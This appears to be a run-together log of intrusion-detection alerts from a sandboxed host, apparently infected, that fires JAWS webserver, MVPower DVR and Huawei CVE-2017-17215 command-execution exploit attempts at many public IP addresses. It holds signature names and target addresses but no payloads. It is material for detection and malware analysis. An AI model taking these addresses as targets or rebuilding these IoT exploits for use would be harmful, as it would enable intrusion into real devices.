                                                          192.168.2.2323.12.99.17136038802030092 01/02/24-06:24:09.103574TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3603880192.168.2.2323.12.99.171
                                                          192.168.2.2318.214.78.16148682802030092 01/02/24-06:24:56.009741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4868280192.168.2.2318.214.78.161
                                                          192.168.2.2323.207.79.24432972802025883 01/02/24-06:24:45.082176TCP2025883ET EXPLOIT MVPower DVR Shell UCE3297280192.168.2.2323.207.79.244
                                                          192.168.2.2338.181.35.21934120802030092 01/02/24-06:23:54.670611TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3412080192.168.2.2338.181.35.219
                                                          192.168.2.23103.204.176.20545228802030092 01/02/24-06:24:18.853608TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4522880192.168.2.23103.204.176.205
                                                          192.168.2.2377.223.119.15053212802025883 01/02/24-06:25:25.284668TCP2025883ET EXPLOIT MVPower DVR Shell UCE5321280192.168.2.2377.223.119.150
                                                          192.168.2.23109.168.109.22945120802030092 01/02/24-06:23:56.151964TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4512080192.168.2.23109.168.109.229
                                                          192.168.2.2344.215.139.22838962802025883 01/02/24-06:25:42.024128TCP2025883ET EXPLOIT MVPower DVR Shell UCE3896280192.168.2.2344.215.139.228
                                                          192.168.2.2364.120.69.4946098802025883 01/02/24-06:24:49.087899TCP2025883ET EXPLOIT MVPower DVR Shell UCE4609880192.168.2.2364.120.69.49
                                                          192.168.2.23209.212.159.21533838802025883 01/02/24-06:25:09.542471TCP2025883ET EXPLOIT MVPower DVR Shell UCE3383880192.168.2.23209.212.159.215
                                                          192.168.2.23149.57.79.10232814802025883 01/02/24-06:23:51.958904TCP2025883ET EXPLOIT MVPower DVR Shell UCE3281480192.168.2.23149.57.79.102
                                                          192.168.2.23170.130.22.25444286802030092 01/02/24-06:24:08.505355TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4428680192.168.2.23170.130.22.254
                                                          192.168.2.2335.244.131.839990802030092 01/02/24-06:25:34.794177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3999080192.168.2.2335.244.131.8
                                                          192.168.2.2338.55.173.24453040802025883 01/02/24-06:23:51.512013TCP2025883ET EXPLOIT MVPower DVR Shell UCE5304080192.168.2.2338.55.173.244
                                                          192.168.2.23208.70.77.18137854802030092 01/02/24-06:24:43.121132TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3785480192.168.2.23208.70.77.181
                                                          192.168.2.2342.237.113.22243184802030092 01/02/24-06:24:52.311736TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4318480192.168.2.2342.237.113.222
                                                          192.168.2.23104.114.164.4947672802025883 01/02/24-06:25:25.169174TCP2025883ET EXPLOIT MVPower DVR Shell UCE4767280192.168.2.23104.114.164.49
                                                          192.168.2.2345.169.136.260250802025883 01/02/24-06:24:37.969433TCP2025883ET EXPLOIT MVPower DVR Shell UCE6025080192.168.2.2345.169.136.2
                                                          192.168.2.235.133.222.13648094802030092 01/02/24-06:23:51.610663TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4809480192.168.2.235.133.222.136
                                                          192.168.2.2399.79.174.3141104802025883 01/02/24-06:25:34.689900TCP2025883ET EXPLOIT MVPower DVR Shell UCE4110480192.168.2.2399.79.174.31
                                                          192.168.2.23138.118.173.13258566802030092 01/02/24-06:24:33.144309TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5856680192.168.2.23138.118.173.132
                                                          192.168.2.232.16.231.22546374802030092 01/02/24-06:24:45.225996TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4637480192.168.2.232.16.231.225
                                                          192.168.2.23154.223.106.9147644802025883 01/02/24-06:24:04.156293TCP2025883ET EXPLOIT MVPower DVR Shell UCE4764480192.168.2.23154.223.106.91
                                                          192.168.2.2320.70.223.6440344802025883 01/02/24-06:24:31.051081TCP2025883ET EXPLOIT MVPower DVR Shell UCE4034480192.168.2.2320.70.223.64
                                                          192.168.2.2323.7.184.25344448802025883 01/02/24-06:24:40.620372TCP2025883ET EXPLOIT MVPower DVR Shell UCE4444880192.168.2.2323.7.184.253
                                                          192.168.2.2323.43.229.22859784802030092 01/02/24-06:23:58.287305TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5978480192.168.2.2323.43.229.228
                                                          192.168.2.23193.233.164.23748736802030092 01/02/24-06:24:17.936241TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4873680192.168.2.23193.233.164.237
                                                          192.168.2.23175.29.154.10159250802025883 01/02/24-06:24:03.503193TCP2025883ET EXPLOIT MVPower DVR Shell UCE5925080192.168.2.23175.29.154.101
                                                          192.168.2.2318.161.154.7646938802030092 01/02/24-06:24:40.755405TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4693880192.168.2.2318.161.154.76
                                                          192.168.2.2362.24.144.16546790802030092 01/02/24-06:25:42.725214TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4679080192.168.2.2362.24.144.165
                                                          192.168.2.23220.134.75.18260554802030092 01/02/24-06:25:32.202180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6055480192.168.2.23220.134.75.182
                                                          192.168.2.23192.126.242.16243294802030092 01/02/24-06:25:09.578837TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4329480192.168.2.23192.126.242.162
                                                          192.168.2.2398.4.73.1259564802030092 01/02/24-06:25:01.180668TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5956480192.168.2.2398.4.73.12
                                                          192.168.2.2318.167.130.6444126802025883 01/02/24-06:24:24.131709TCP2025883ET EXPLOIT MVPower DVR Shell UCE4412680192.168.2.2318.167.130.64
                                                          192.168.2.23154.208.198.21441798802025883 01/02/24-06:24:45.035888TCP2025883ET EXPLOIT MVPower DVR Shell UCE4179880192.168.2.23154.208.198.214
                                                          192.168.2.23106.15.76.4851782802030092 01/02/24-06:24:31.040036TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5178280192.168.2.23106.15.76.48
                                                          192.168.2.2362.254.208.1058096802025883 01/02/24-06:24:13.764312TCP2025883ET EXPLOIT MVPower DVR Shell UCE5809680192.168.2.2362.254.208.10
                                                          192.168.2.2396.67.179.140870802025883 01/02/24-06:24:10.828261TCP2025883ET EXPLOIT MVPower DVR Shell UCE4087080192.168.2.2396.67.179.1
                                                          192.168.2.2335.231.230.6033018802025883 01/02/24-06:25:03.820714TCP2025883ET EXPLOIT MVPower DVR Shell UCE3301880192.168.2.2335.231.230.60
                                                          192.168.2.23210.136.185.6435820802030092 01/02/24-06:25:42.761377TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3582080192.168.2.23210.136.185.64
                                                          192.168.2.23201.229.167.15941366802030092 01/02/24-06:24:19.178132TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4136680192.168.2.23201.229.167.159
                                                          192.168.2.23142.58.163.9638386802030092 01/02/24-06:23:55.563204TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3838680192.168.2.23142.58.163.96
                                                          192.168.2.23217.23.144.15954616802030092 01/02/24-06:25:02.033209TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5461680192.168.2.23217.23.144.159
                                                          192.168.2.235.63.152.5938096802025883 01/02/24-06:24:37.257342TCP2025883ET EXPLOIT MVPower DVR Shell UCE3809680192.168.2.235.63.152.59
                                                          192.168.2.2349.233.248.20255454802030092 01/02/24-06:25:29.740902TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5545480192.168.2.2349.233.248.202
                                                          192.168.2.2323.3.57.12446500802025883 01/02/24-06:25:22.066559TCP2025883ET EXPLOIT MVPower DVR Shell UCE4650080192.168.2.2323.3.57.124
                                                          192.168.2.23154.216.168.7659634802030092 01/02/24-06:23:58.312912TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5963480192.168.2.23154.216.168.76
                                                          192.168.2.2387.249.21.23144962802025883 01/02/24-06:23:59.225841TCP2025883ET EXPLOIT MVPower DVR Shell UCE4496280192.168.2.2387.249.21.231
                                                          192.168.2.2352.216.42.2137628802030092 01/02/24-06:25:15.620032TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3762880192.168.2.2352.216.42.21
                                                          192.168.2.23195.62.126.5460000802030092 01/02/24-06:24:11.155988TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6000080192.168.2.23195.62.126.54
                                                          192.168.2.2391.146.142.15155428802030092 01/02/24-06:24:27.710944TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5542880192.168.2.2391.146.142.151
                                                          192.168.2.2347.96.31.6043368802030092 01/02/24-06:24:32.931561TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4336880192.168.2.2347.96.31.60
                                                          192.168.2.23123.1.253.23654834802030092 01/02/24-06:24:30.849841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5483480192.168.2.23123.1.253.236
                                                          192.168.2.2345.243.32.10952362802030092 01/02/24-06:25:05.266557TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5236280192.168.2.2345.243.32.109
                                                          192.168.2.2324.236.125.8436362802025883 01/02/24-06:23:50.012962TCP2025883ET EXPLOIT MVPower DVR Shell UCE3636280192.168.2.2324.236.125.84
                                                          192.168.2.23104.91.11.15157840802025883 01/02/24-06:23:57.977771TCP2025883ET EXPLOIT MVPower DVR Shell UCE5784080192.168.2.23104.91.11.151
                                                          192.168.2.23157.90.166.540292802030092 01/02/24-06:25:26.148693TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4029280192.168.2.23157.90.166.5
                                                          192.168.2.2374.48.170.2654894802025883 01/02/24-06:24:48.887995TCP2025883ET EXPLOIT MVPower DVR Shell UCE5489480192.168.2.2374.48.170.26
                                                          192.168.2.23174.71.165.22954816802025883 01/02/24-06:24:51.730581TCP2025883ET EXPLOIT MVPower DVR Shell UCE5481680192.168.2.23174.71.165.229
                                                          192.168.2.2334.88.138.1944478802030092 01/02/24-06:25:30.159443TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4447880192.168.2.2334.88.138.19
                                                          192.168.2.23159.69.20.6060990802025883 01/02/24-06:23:51.599206TCP2025883ET EXPLOIT MVPower DVR Shell UCE6099080192.168.2.23159.69.20.60
                                                          192.168.2.2391.242.215.20436660802030092 01/02/24-06:24:18.756077TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3666080192.168.2.2391.242.215.204
                                                          192.168.2.2334.224.189.17652658802030092 01/02/24-06:25:00.915017TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5265880192.168.2.2334.224.189.176
                                                          192.168.2.23116.202.207.17543532802025883 01/02/24-06:24:40.704654TCP2025883ET EXPLOIT MVPower DVR Shell UCE4353280192.168.2.23116.202.207.175
                                                          192.168.2.2352.222.57.8340002802030092 01/02/24-06:24:17.613377TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4000280192.168.2.2352.222.57.83
                                                          192.168.2.2335.242.176.1443110802030092 01/02/24-06:25:21.012628TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4311080192.168.2.2335.242.176.14
                                                          192.168.2.23114.55.243.17648672802030092 01/02/24-06:25:22.179481TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4867280192.168.2.23114.55.243.176
                                                          192.168.2.2351.210.249.6660948802030092 01/02/24-06:24:52.075605TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6094880192.168.2.2351.210.249.66
                                                          192.168.2.2323.217.78.18433170802030092 01/02/24-06:25:04.964747TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3317080192.168.2.2323.217.78.184
                                                          192.168.2.23197.26.86.8560062802030092 01/02/24-06:25:19.114868TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6006280192.168.2.23197.26.86.85
                                                          192.168.2.23211.149.152.3757174802030092 01/02/24-06:25:42.230065TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5717480192.168.2.23211.149.152.37
                                                          192.168.2.2345.15.66.2040310802030092 01/02/24-06:24:05.830727TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4031080192.168.2.2345.15.66.20
                                                          192.168.2.2337.97.157.9157446802025883 01/02/24-06:25:34.999588TCP2025883ET EXPLOIT MVPower DVR Shell UCE5744680192.168.2.2337.97.157.91
                                                          192.168.2.23211.251.235.10549264802030092 01/02/24-06:25:44.278757TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4926480192.168.2.23211.251.235.105
                                                          192.168.2.23176.112.147.6145918802025883 01/02/24-06:24:56.122079TCP2025883ET EXPLOIT MVPower DVR Shell UCE4591880192.168.2.23176.112.147.61
                                                          192.168.2.23104.73.17.2758458802025883 01/02/24-06:24:01.120240TCP2025883ET EXPLOIT MVPower DVR Shell UCE5845880192.168.2.23104.73.17.27
                                                          192.168.2.2352.188.170.14760094802025883 01/02/24-06:24:56.015920TCP2025883ET EXPLOIT MVPower DVR Shell UCE6009480192.168.2.2352.188.170.147
                                                          192.168.2.23143.0.84.21038402802030092 01/02/24-06:24:01.350138TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3840280192.168.2.23143.0.84.210
                                                          192.168.2.2368.233.96.13258694802025883 01/02/24-06:25:19.392967TCP2025883ET EXPLOIT MVPower DVR Shell UCE5869480192.168.2.2368.233.96.132
                                                          192.168.2.23104.21.5.8858690802030092 01/02/24-06:24:30.711855TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5869080192.168.2.23104.21.5.88
                                                          192.168.2.23104.107.28.1660550802030092 01/02/24-06:23:51.391248TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6055080192.168.2.23104.107.28.16
                                                          192.168.2.2318.67.255.7133036802025883 01/02/24-06:24:42.963614TCP2025883ET EXPLOIT MVPower DVR Shell UCE3303680192.168.2.2318.67.255.71
                                                          192.168.2.23154.37.215.11352664802025883 01/02/24-06:25:06.760411TCP2025883ET EXPLOIT MVPower DVR Shell UCE5266480192.168.2.23154.37.215.113
                                                          192.168.2.2318.140.253.6745590802030092 01/02/24-06:25:35.354970TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4559080192.168.2.2318.140.253.67
                                                          192.168.2.23104.76.96.2160320802030092 01/02/24-06:25:15.761034TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6032080192.168.2.23104.76.96.21
                                                          192.168.2.232.136.180.9132958802030092 01/02/24-06:24:20.174770TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3295880192.168.2.232.136.180.91
                                                          192.168.2.23156.235.99.4053148372152835222 01/02/24-06:25:03.497246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314837215192.168.2.23156.235.99.40
                                                          192.168.2.2388.151.101.14851274802030092 01/02/24-06:25:35.254797TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5127480192.168.2.2388.151.101.148
                                                          192.168.2.2345.56.102.14636664802030092 01/02/24-06:24:56.015984TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3666480192.168.2.2345.56.102.146
                                                          192.168.2.2362.202.156.24135188802025883 01/02/24-06:24:17.662475TCP2025883ET EXPLOIT MVPower DVR Shell UCE3518880192.168.2.2362.202.156.241
                                                          192.168.2.2323.77.132.17740724802025883 01/02/24-06:24:18.209402TCP2025883ET EXPLOIT MVPower DVR Shell UCE4072480192.168.2.2323.77.132.177
                                                          192.168.2.23202.88.191.10458160802030092 01/02/24-06:23:59.400873TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5816080192.168.2.23202.88.191.104
                                                          192.168.2.23209.97.134.8644200802025883 01/02/24-06:24:43.211070TCP2025883ET EXPLOIT MVPower DVR Shell UCE4420080192.168.2.23209.97.134.86
                                                          192.168.2.2367.160.112.10851240802030092 01/02/24-06:25:15.888424TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5124080192.168.2.2367.160.112.108
                                                          192.168.2.2362.210.48.11336542802030092 01/02/24-06:25:31.316043TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3654280192.168.2.2362.210.48.113
                                                          192.168.2.23104.25.137.9540366802030092 01/02/24-06:24:34.920245TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4036680192.168.2.23104.25.137.95
                                                          192.168.2.23156.235.97.23040630372152835222 01/02/24-06:23:56.194246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.23156.235.97.230
                                                          192.168.2.23185.79.154.21054452802030092 01/02/24-06:24:58.941620TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5445280192.168.2.23185.79.154.210
                                                          192.168.2.23109.109.200.17557970802025883 01/02/24-06:24:01.322259TCP2025883ET EXPLOIT MVPower DVR Shell UCE5797080192.168.2.23109.109.200.175
                                                          192.168.2.23175.126.123.11658590802030092 01/02/24-06:25:04.257669TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5859080192.168.2.23175.126.123.116
                                                          192.168.2.23156.254.85.3256952372152829579 01/02/24-06:25:03.334382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695237215192.168.2.23156.254.85.32
                                                          192.168.2.23107.149.236.15149944802030092 01/02/24-06:24:54.829093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4994480192.168.2.23107.149.236.151
                                                          192.168.2.23146.71.40.21548486802025883 01/02/24-06:24:05.866440TCP2025883ET EXPLOIT MVPower DVR Shell UCE4848680192.168.2.23146.71.40.215
                                                          192.168.2.2323.205.246.4848598802030092 01/02/24-06:24:55.255106TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4859880192.168.2.2323.205.246.48
                                                          192.168.2.2323.37.135.6550062802025883 01/02/24-06:24:03.045010TCP2025883ET EXPLOIT MVPower DVR Shell UCE5006280192.168.2.2323.37.135.65
                                                          192.168.2.2337.32.125.6150126802025883 01/02/24-06:24:18.097501TCP2025883ET EXPLOIT MVPower DVR Shell UCE5012680192.168.2.2337.32.125.61
                                                          192.168.2.23142.93.144.23436246802025883 01/02/24-06:24:36.837939TCP2025883ET EXPLOIT MVPower DVR Shell UCE3624680192.168.2.23142.93.144.234
                                                          192.168.2.23172.121.20.14551014802030092 01/02/24-06:24:24.984846TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5101480192.168.2.23172.121.20.145
                                                          192.168.2.23181.206.2.4650076802025883 01/02/24-06:24:03.265616TCP2025883ET EXPLOIT MVPower DVR Shell UCE5007680192.168.2.23181.206.2.46
                                                          192.168.2.23185.2.14.1251600802025883 01/02/24-06:24:35.360260TCP2025883ET EXPLOIT MVPower DVR Shell UCE5160080192.168.2.23185.2.14.12
                                                          192.168.2.23156.253.36.648376372152835222 01/02/24-06:24:16.442516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837637215192.168.2.23156.253.36.6
                                                          192.168.2.2352.35.155.16647130802030092 01/02/24-06:25:42.678669TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4713080192.168.2.2352.35.155.166
                                                          192.168.2.2352.85.133.3147266802025883 01/02/24-06:24:51.888604TCP2025883ET EXPLOIT MVPower DVR Shell UCE4726680192.168.2.2352.85.133.31
                                                          192.168.2.23104.75.225.9144926802025883 01/02/24-06:24:58.708367TCP2025883ET EXPLOIT MVPower DVR Shell UCE4492680192.168.2.23104.75.225.91
                                                          192.168.2.2323.231.150.12851852802025883 01/02/24-06:24:24.125011TCP2025883ET EXPLOIT MVPower DVR Shell UCE5185280192.168.2.2323.231.150.128
                                                          192.168.2.23216.172.159.3643926802025883 01/02/24-06:25:37.943407TCP2025883ET EXPLOIT MVPower DVR Shell UCE4392680192.168.2.23216.172.159.36
                                                          192.168.2.23156.247.27.1551010372152835222 01/02/24-06:24:09.783413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101037215192.168.2.23156.247.27.15
                                                          192.168.2.23156.247.20.25537352372152835222 01/02/24-06:25:07.990796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735237215192.168.2.23156.247.20.255
                                                          192.168.2.23106.14.41.17435930802030092 01/02/24-06:24:18.753229TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3593080192.168.2.23106.14.41.174
                                                          192.168.2.23104.71.83.3248722802030092 01/02/24-06:25:16.196517TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4872280192.168.2.23104.71.83.32
                                                          192.168.2.2318.223.213.8951292802025883 01/02/24-06:25:25.918831TCP2025883ET EXPLOIT MVPower DVR Shell UCE5129280192.168.2.2318.223.213.89
                                                          192.168.2.23148.72.211.16752086802025883 01/02/24-06:24:45.420651TCP2025883ET EXPLOIT MVPower DVR Shell UCE5208680192.168.2.23148.72.211.167
                                                          192.168.2.2334.216.109.859862802030092 01/02/24-06:24:27.341329TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5986280192.168.2.2334.216.109.8
                                                          192.168.2.23119.23.86.14936618802030092 01/02/24-06:25:42.547024TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3661880192.168.2.23119.23.86.149
                                                          192.168.2.23109.196.234.1858414802025883 01/02/24-06:23:55.633320TCP2025883ET EXPLOIT MVPower DVR Shell UCE5841480192.168.2.23109.196.234.18
                                                          192.168.2.23104.79.255.2941640802025883 01/02/24-06:24:05.776321TCP2025883ET EXPLOIT MVPower DVR Shell UCE4164080192.168.2.23104.79.255.29
                                                          192.168.2.2374.217.134.1157808802030092 01/02/24-06:25:44.030944TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5780880192.168.2.2374.217.134.11
                                                          192.168.2.2345.32.70.4540790802030092 01/02/24-06:24:45.911026TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4079080192.168.2.2345.32.70.45
                                                          192.168.2.2323.194.37.21755520802025883 01/02/24-06:23:55.440502TCP2025883ET EXPLOIT MVPower DVR Shell UCE5552080192.168.2.2323.194.37.217
                                                          192.168.2.2313.244.84.14656714802025883 01/02/24-06:24:09.228401TCP2025883ET EXPLOIT MVPower DVR Shell UCE5671480192.168.2.2313.244.84.146
                                                          192.168.2.23202.75.103.11733286802025883 01/02/24-06:24:31.278952TCP2025883ET EXPLOIT MVPower DVR Shell UCE3328680192.168.2.23202.75.103.117
                                                          192.168.2.23104.100.160.20360636802030092 01/02/24-06:25:11.730540TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6063680192.168.2.23104.100.160.203
                                                          192.168.2.2362.138.75.22955822802025883 01/02/24-06:25:35.265496TCP2025883ET EXPLOIT MVPower DVR Shell UCE5582280192.168.2.2362.138.75.229
                                                          192.168.2.2345.91.92.17553294802030092 01/02/24-06:25:42.747930TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5329480192.168.2.2345.91.92.175
                                                          192.168.2.23156.254.94.2659154372152829579 01/02/24-06:25:03.334223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915437215192.168.2.23156.254.94.26
                                                          192.168.2.23156.235.102.17138108372152835222 01/02/24-06:24:02.515190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810837215192.168.2.23156.235.102.171
                                                          192.168.2.23172.67.240.21640034802025883 01/02/24-06:25:29.545694TCP2025883ET EXPLOIT MVPower DVR Shell UCE4003480192.168.2.23172.67.240.216
                                                          192.168.2.2382.165.119.13360268802025883 01/02/24-06:24:19.252681TCP2025883ET EXPLOIT MVPower DVR Shell UCE6026880192.168.2.2382.165.119.133
                                                          192.168.2.2381.45.23.21550156802030092 01/02/24-06:25:39.133513TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5015680192.168.2.2381.45.23.215
                                                          192.168.2.23156.77.130.17758998372152829579 01/02/24-06:24:06.202488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899837215192.168.2.23156.77.130.177
                                                          192.168.2.2354.219.136.3735172802025883 01/02/24-06:25:18.698984TCP2025883ET EXPLOIT MVPower DVR Shell UCE3517280192.168.2.2354.219.136.37
                                                          192.168.2.23164.132.227.17152970802030092 01/02/24-06:25:19.078205TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5297080192.168.2.23164.132.227.171
                                                          192.168.2.23103.131.18.24355884802030092 01/02/24-06:25:21.511351TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5588480192.168.2.23103.131.18.243
                                                          192.168.2.23101.42.123.6038286802030092 01/02/24-06:23:49.854020TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3828680192.168.2.23101.42.123.60
                                                          192.168.2.23156.254.98.9037532372152829579 01/02/24-06:23:56.031360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753237215192.168.2.23156.254.98.90
                                                          192.168.2.2341.111.241.3452770802030092 01/02/24-06:25:30.188511TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5277080192.168.2.2341.111.241.34
                                                          192.168.2.23113.198.35.22256150802030092 01/02/24-06:23:49.840400TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5615080192.168.2.23113.198.35.222
                                                          192.168.2.23173.224.201.17554220802025883 01/02/24-06:24:23.810709TCP2025883ET EXPLOIT MVPower DVR Shell UCE5422080192.168.2.23173.224.201.175
                                                          192.168.2.23104.105.18.18246624802025883 01/02/24-06:24:13.802828TCP2025883ET EXPLOIT MVPower DVR Shell UCE4662480192.168.2.23104.105.18.182
                                                          192.168.2.2352.208.51.24237438802030092 01/02/24-06:24:46.160935TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3743880192.168.2.2352.208.51.242
                                                          192.168.2.23104.24.209.20437990802025883 01/02/24-06:25:29.545650TCP2025883ET EXPLOIT MVPower DVR Shell UCE3799080192.168.2.23104.24.209.204
                                                          192.168.2.23204.152.46.6744196802030092 01/02/24-06:24:40.815829TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4419680192.168.2.23204.152.46.67
                                                          192.168.2.2338.6.180.18441692802030092 01/02/24-06:25:01.064194TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4169280192.168.2.2338.6.180.184
                                                          192.168.2.2394.253.89.2442508802025883 01/02/24-06:23:50.267161TCP2025883ET EXPLOIT MVPower DVR Shell UCE4250880192.168.2.2394.253.89.24
                                                          192.168.2.23156.253.47.15437722372152829579 01/02/24-06:24:59.013684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772237215192.168.2.23156.253.47.154
                                                          192.168.2.2318.65.143.9547196802030092 01/02/24-06:25:12.172054TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4719680192.168.2.2318.65.143.95
                                                          192.168.2.23156.235.102.23453884372152835222 01/02/24-06:24:34.990700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388437215192.168.2.23156.235.102.234
                                                          192.168.2.23198.154.232.24259276802025883 01/02/24-06:24:45.021090TCP2025883ET EXPLOIT MVPower DVR Shell UCE5927680192.168.2.23198.154.232.242
                                                          192.168.2.2387.255.233.5348182802025883 01/02/24-06:24:08.655481TCP2025883ET EXPLOIT MVPower DVR Shell UCE4818280192.168.2.2387.255.233.53
                                                          192.168.2.23104.125.2.9460962802030092 01/02/24-06:24:40.594854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6096280192.168.2.23104.125.2.94
                                                          192.168.2.23154.92.226.19933136802030092 01/02/24-06:24:13.806614TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3313680192.168.2.23154.92.226.199
                                                          192.168.2.23199.232.239.4846658802030092 01/02/24-06:24:23.868552TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4665880192.168.2.23199.232.239.48
                                                          192.168.2.23114.33.8.1834070802030092 01/02/24-06:25:18.822764TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3407080192.168.2.23114.33.8.18
                                                          192.168.2.23154.221.82.22160596802025883 01/02/24-06:25:02.335948TCP2025883ET EXPLOIT MVPower DVR Shell UCE6059680192.168.2.23154.221.82.221
                                                          192.168.2.23185.110.26.8256372802025883 01/02/24-06:24:19.276074TCP2025883ET EXPLOIT MVPower DVR Shell UCE5637280192.168.2.23185.110.26.82
                                                          192.168.2.23103.50.160.13953436802030092 01/02/24-06:24:30.812927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5343680192.168.2.23103.50.160.139
                                                          192.168.2.2351.68.46.2342144802025883 01/02/24-06:24:54.912247TCP2025883ET EXPLOIT MVPower DVR Shell UCE4214480192.168.2.2351.68.46.23
